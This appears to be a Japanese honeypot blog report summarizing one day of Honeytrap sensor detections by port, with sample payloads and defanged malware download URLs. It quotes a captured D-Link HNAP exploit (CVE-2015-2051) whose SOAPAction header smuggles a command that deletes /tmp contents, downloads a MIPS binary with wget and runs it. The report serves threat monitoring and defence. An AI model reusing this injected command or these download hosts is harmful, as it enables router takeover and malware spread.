【ハニーポット】Honeytrap簡易分析(148日目:1/3)
Honeytrap簡易分析(148日目:1/3) の簡易分析となります。
◾️【ハニーポット】Honeytrap簡易分析(148日目:1/3)
※80ポートは集計対象外
<送信元別(国)>
<検知数グラフ>
<宛先検知数>
宛先 ポート |
検知数 | サービス | ペイロード例 |
445 | 1858 | SMB | SMBrS@bPC NETWORK PROGRAM 1.0 |
52869 | 183 | Realtek SDK | POST /picsdesc.xml |
1433 | 156 | Microsoft SQL Server | S.E.R.V.E.R.s.a.O.S.Q.L |
22 | 133 | SSH | SSH-2.0-libssh2_1.7.0.. |
2222 | 65 | SSH | SSH-2.0-libssh2_1.7.0.. |
3389 | 49 | RDP | ...+&......Cookie: mstshash=hello.......... |
8080 | 38 | PROXY | GET / HTTP/1.1 |
990 | 37 | ? | ? |
9200 | 36 | ? | ? |
8545 | 35 | Ethereum | {"jsonrpc":"2.0","id":1,"method":"eth_getBlockByNumber","params":["0x0",false]}.. |
52869/tcp に対する Realtek の脆弱性を狙った攻撃が増加傾向でした。また、少量ですが、Ethereum 宛の通信も検知していました。
Ethereum 宛の通信はブロック情報を取得するJSON-RPCのeth_getBlockByNumberを利用したものでした。
<新規マルウェア>
ポート | マルウェアダウンロード先 | VT |
5555 | hxxp://185[.]62[.]190[.]35/c | |
8081 | hxxp://185[.]101[.]105[.]129/bins/kalon[.]mips | |
52869 | hxxp://164[.]132[.]119[.]65/mips |
◾️8081宛の通信
D-Linkルータの脆弱性(CVE-2015-2051)を狙った攻撃でした。
ペイロード
POST /HNAP1/ HTTP/1.0
Content-Type: text/xml;
charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://xxx[.]xxx.xxx.xxx/kenjiro.mips && chmod 777 /tmp/kenjiro.mips/ && /tmp/kenjiro.mips`
〜省略〜
以上となります。